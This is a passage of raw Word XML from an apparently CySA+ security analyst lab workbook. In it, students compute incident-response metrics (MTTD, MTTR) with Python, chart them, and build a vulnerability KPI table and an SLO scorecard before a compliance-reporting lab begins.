        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    for r in csv.DictReader(f):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        for k in ("opened","first_alert","response_start","remediated"):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            r[k]=dt.datetime.fromisoformat(r[k])</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        rows.append(r)</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rows.sort(key=lambda r:r["opened"])</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ids   = [r["id"]                                          for r in rows]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>mttd  = [(r["opened"]-r["first_alert"]).total_seconds()/60          for r in rows]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>mtres = [(r["response_start"]-r["opened"]).total_seconds()/60       for r in rows]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>mtrem = [(r["remediated"]-r["opened"]).total_seconds()/60           for r in rows]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>vol   = [int(r["alert_count"])                                      for r in rows]</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fig, ax = plt.subplots(2, 2, figsize=(12,8))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ax[0,0].bar(ids, mttd, color="#4477aa");  ax[0,0].set_title("MTTD (min)");          ax[0,0].axhline(30, color="r", ls="--")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ax[0,1].bar(ids, mtres, color="#66ccee"); ax[0,1].set_title("MTTR-respond (min)");   ax[0,1].axhline(60, color="r", ls="--")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ax[1,0].bar(ids, mtrem, color="#ee6677"); ax[1,0].set_title("MTTR-remediate (min)")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ax[1,1].bar(ids, vol,  color="#ccbb44");  ax[1,1].set_title("Alerts per incident")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>for a in ax.flatten():</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    a.tick_params(axis='x', rotation=45)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>plt.tight_layout()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>plt.savefig("dashboard.png", dpi=120)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>print("wrote dashboard.png")</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python3 dashboard.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ls -lh dashboard.png</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Open dashboard.png from Killercoda's file browser. Red dashed lines mark SLO targets — any bar over the line is an incident that breached SLO.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 5 — Identify trends (CySA+ "Trends")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>python3 - &lt;&lt;'EOF'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>import csv, datetime as dt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>buckets={}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>with open("incidents.csv") as f:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    for r in csv.DictReader(f):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        m=r["opened"][:7]            # YYYY-MM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        buckets.setdefault(m,[]).append(r)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>for m in sorted(buckets):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    print(m, "incidents:", len(buckets[m]),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          "sev1:", sum(1 for r in buckets[m] if r["sev"]=="1"))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>EOF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>A spike in sev-1 month-over-month is the headline finding for the CISO slide.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 6 — Critical vulnerabilities &amp; zero-day exposure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CySA+ 4.1 names "Critical vulnerabilities and zero-days" as a top metric. Add a second feed (from Lab 26 findings.csv):</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fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>This month</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Open P1 (CVSS ≥ 9.0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Zero-days with no vendor patch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>KEV-catalog hits open &gt; 7 d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Stack-rank with the table above on the same dashboard page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 7 — SLO scorecard</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CySA+ 4.1 / 4.2 "SLOs". A traffic-light board the executive can read in 5 seconds:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cat &gt; slo.md &lt;&lt;'EOF'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| SLO | Target | Actual | Status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MTTD | &lt; 30 min | 17 min | 🟢 |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| MTTR respond | &lt; 60 min | 19 min | 🟢 |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| MTTR remediate (sev 1) | &lt; 4 h | 3 h | 🟢 |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| P1 open &gt; 7 d | 0 | 1 | 🔴 |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Zero-days unpatched | 0 | 0 | 🟢 |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>EOF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cat slo.md</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>What You Learned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Compute MTTD, MTTR-respond, MTTR-remediate, and alert volume from raw incident data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Plot a single-page KPI dashboard with matplotlib.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Identify monthly trends and SLO breaches.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Combine vulnerability KPIs (P1, zero-day, KEV) with incident KPIs into an executive scorecard.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:shd w:val="clear" w:fill="FDF3E7"/>
        <w:ind w:left="144" w:right="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="C87A1E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Test it: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>You should be able to compute MTTD, MTTR-respond, MTTR-remediate, and alert volume from raw incident data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Lab 29 — Compliance Reporting (PCI DSS / ISO 27001 / NIST CSF)</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produce a compliance crosswalk that maps your lab evidence to PCI DSS, ISO 27001 Annex A, NIST CSF, and CIS Controls v8 — the four frameworks CySA+ 2.1 / 4.1 expects you to recognise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>In this lab you will produce a compliance crosswalk that maps your lab evidence to PCI DSS, ISO 27001 Annex A, NIST CSF, and CIS Controls v8 — the four frameworks CySA+ 2.1 / 4.1 expects you to recognise. This is the lab the auditor reads.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
